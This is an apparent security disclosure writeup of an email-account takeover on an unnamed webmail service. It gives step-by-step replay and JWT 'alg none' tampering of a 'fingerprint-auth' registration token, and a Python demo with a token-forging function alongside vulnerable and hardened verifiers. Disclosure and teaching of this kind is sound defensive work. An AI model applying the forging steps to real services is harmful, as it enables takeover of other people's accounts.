disclosure #2 - email takeover

scheduled to be released nov 4th 2025.

i was advised to not share the name of the service for reasons i shan't explain (iykyk)

as a broad summary:

a replay attack lets an attacker bind a brand-new account to someone else's email address. the flow:

1. create a legitimate email account while routing the browser through an intercepting proxy (mitmproxy, burp suite) and hold the registration request at the proxy.
2. capture the 'fingerprint-auth' value from that request. it carries a jwt whose payload includes a targetMail claim, i.e. the address the new account is being created for.
3. edit the jwt so that it is unsigned: strip the signature and mark the token as carrying none, then change targetMail to the address to be taken over.
4. submit a fresh registration with the modified 'fingerprint-auth' payload. the backend accepts the unsigned token, trusts the tampered targetMail, and binds the new account to the victim's address.

in short, this allowed an attacker to take over any email address on the webmail service. the issue was patched a month before this writeup.
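to make the failure concrete, here is a small added model of the token flow above. it is my own illustration, not code from the affected service: the claim name targetMail and the 'fingerprint-auth' token come from the writeup, everything else (the HS256 key, the claim layout, the vulnerable and hardened verifiers) is assumed for the demo. the vulnerable verifier trusts the alg field in the attacker-controlled header, so a token rewritten to alg none with the signature stripped sails through; the hardened verifier pins the algorithm server-side and always checks the mac.

```python
import base64
import hashlib
import hmac
import json

# constructed for the demo; a real service keeps this server-side
SECRET = b"server-side-hmac-key-for-demo-only"


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _segment(obj: dict) -> str:
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def issue_fingerprint_auth(target_mail: str) -> str:
    """server side: mint the 'fingerprint-auth' jwt for a registration (assumed layout)."""
    header = {"alg": "HS256", "typ": "JWT"}
    payload = {"targetMail": target_mail, "purpose": "register"}
    signing_input = _segment(header) + "." + _segment(payload)
    sig = hmac.new(SECRET, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def tamper(token: str, new_target: str) -> str:
    """attacker side: what step 3 of the writeup does to the captured token.
    the header is rewritten to alg none, targetMail is swapped, the signature is dropped."""
    header_b64, payload_b64, _sig = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(payload_b64))
    header["alg"] = "none"
    payload["targetMail"] = new_target
    return _segment(header) + "." + _segment(payload) + "."


def verify_vulnerable(token: str) -> dict:
    """assumed vulnerable verifier: honours the alg the client sent, so alg none
    means 'skip the signature check'."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") == "none":
        return json.loads(b64url_decode(payload_b64))
    expected = hmac.new(SECRET, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(b64url(expected), sig_b64):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(payload_b64))


def verify_hardened(token: str) -> dict:
    """hardened verifier: the algorithm is pinned server-side and the mac is
    always checked, so neither alg none nor a stripped signature is accepted."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        raise ValueError("unexpected alg")
    expected = hmac.new(SECRET, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(b64url(expected), sig_b64):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(payload_b64))


def register(verify, token: str):
    """the address the new account gets bound to, or None if the token is rejected."""
    try:
        return verify(token)["targetMail"]
    except ValueError:
        return None


if __name__ == "__main__":
    legit = issue_fingerprint_auth("attacker@example.com")
    forged = tamper(legit, "victim@example.com")
    print("vulnerable, legit  ->", register(verify_vulnerable, legit))
    print("vulnerable, forged ->", register(verify_vulnerable, forged))
    print("hardened,   forged ->", register(verify_hardened, forged))
```

pinning the algorithm closes the unsigned-token hole, but it does not by itself stop the replay half of the attack: a validly signed 'fingerprint-auth' captured from one registration could still be resubmitted. a single-use identifier (jti) checked and consumed server-side, plus a short expiry, is the usual companion fix.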